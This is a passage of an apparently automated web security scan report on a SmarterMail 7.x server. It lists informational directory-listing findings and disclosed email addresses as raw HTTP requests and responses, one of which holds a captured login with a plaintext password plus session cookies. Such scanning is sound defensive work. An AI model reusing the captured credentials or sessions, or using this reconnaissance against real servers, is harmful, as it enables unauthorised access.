<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>
...[SNIP]...

12.56. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/misc/tree/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/images/misc/tree/

Request

GET /App_Themes/Default/images/misc/tree/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Misc/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1989
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/misc/tree/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/images/misc/">[To Parent Directory]</A>
...[SNIP]...

12.57. http://vulnerable.SmarterMail 7.x.host:9998/MailProcessing/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /MailProcessing/

Request

GET /MailProcessing/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 4734
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /MailProcessing/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-f
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.58. http://vulnerable.SmarterMail 7.x.host:9998/Main/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/

Request

GET /Main/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 9191
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Main/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Ver
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.59. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Alerts/

Request

GET /Main/Alerts/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1866
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Main/Alerts/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fami
...[SNIP]...
<PRE>
<A href="/Main/">[To Parent Directory]</A>
...[SNIP]...

12.60. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/

Request

GET /Main/Calendar/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1658
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Main/Calendar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fa
...[SNIP]...
<PRE>
<A href="/Main/">[To Parent Directory]</A>
...[SNIP]...

12.61. http://vulnerable.SmarterMail 7.x.host:9998/Main/Sharing/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Sharing/

Request

GET /Main/Sharing/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:09 GMT
Content-Length: 1565
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Main/Sharing/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fam
...[SNIP]...
<PRE>
<A href="/Main/">[To Parent Directory]</A>
...[SNIP]...

12.62. http://vulnerable.SmarterMail 7.x.host:9998/Reports/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/

Request

GET /Reports/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 2112
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Reports/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.63. http://vulnerable.SmarterMail 7.x.host:9998/Reports/Controls/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/Controls/

Request

GET /Reports/Controls/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 1471
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Reports/Controls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font
...[SNIP]...
<PRE>
<A href="/Reports/">[To Parent Directory]</A>
...[SNIP]...

12.64. http://vulnerable.SmarterMail 7.x.host:9998/Services/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Services/

Request

GET /Services/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 2862
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Services/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.65. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /SystemAdmin/

Request

GET /SystemAdmin/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 9879
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /SystemAdmin/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fami
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.66. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/GettingStarted/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /SystemAdmin/GettingStarted/

Request

GET /SystemAdmin/GettingStarted/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 1513
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /SystemAdmin/GettingStarted/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/SystemAdmin/">[To Parent Directory]</A>
...[SNIP]...

12.67. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/

Request

GET /UserControls/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 3219
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fam
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.68. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Calendar/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Calendar/

Request

GET /UserControls/Calendar/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:12 GMT
Content-Length: 1692
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/Calendar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p
...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

12.69. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/PanelBarTemplates/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/PanelBarTemplates/

Request

GET /UserControls/PanelBarTemplates/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:13 GMT
Content-Length: 2739
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/PanelBarTemplates/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

12.70. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/

Request

GET /UserControls/Popups/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 2907
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/Popups/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {f
...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

12.71. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/ThirdPartyComponents/

Request

GET /UserControls/ThirdPartyComponents/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:13 GMT
Content-Length: 1651
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/ThirdPartyComponents/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

12.72. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/TodayPageTemplates/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/TodayPageTemplates/

Request

GET /UserControls/TodayPageTemplates/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:13 GMT
Content-Length: 1694
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/TodayPageTemplates/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

13. Email addresses disclosed  previous  next
There are 14 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


13.1. http://vulnerable.SmarterMail 7.x.host:9998/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:23:26 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=wmcwqwar3z1uqmbg32jkdrmv; path=/; HttpOnly
Set-Cookie: SM5Skin=Default; expires=Thu, 01-Oct-2020 22:23:26 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 30030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<span class="HeaderUserName">enduser@hoytllc.com</span>
...[SNIP]...

13.2. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Default.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx?unframed=true
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:34:49 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 30106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<span class="HeaderUserName">euser@hoytllc.com</span>
...[SNIP]...

13.3. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Default.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx?unframed=true
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:15 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 30114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<span class="HeaderUserName">enduser@hoytllc.com</span>
...[SNIP]...

13.4. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

POST /Login.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; settings=; SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}
Content-Length: 1287

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&ctl00%24MPH%24txtUserName=enduser%40hoytllc.com&ctl00%24MPH%24txtPassword=end123&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:27:23 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Thu, 01-Oct-2020 22:27:23 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5510

3592|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitle
...[SNIP]...
<div class="LoginLabel">
           Email Address
           (ex. user@example.com)
       </div>
       <input name="ctl00$MPH$txtUserName" type="text" value="enduser@hoytllc.com" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
...[SNIP]...

13.5. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

POST /Login.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; settings=; SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}
Content-Length: 1287

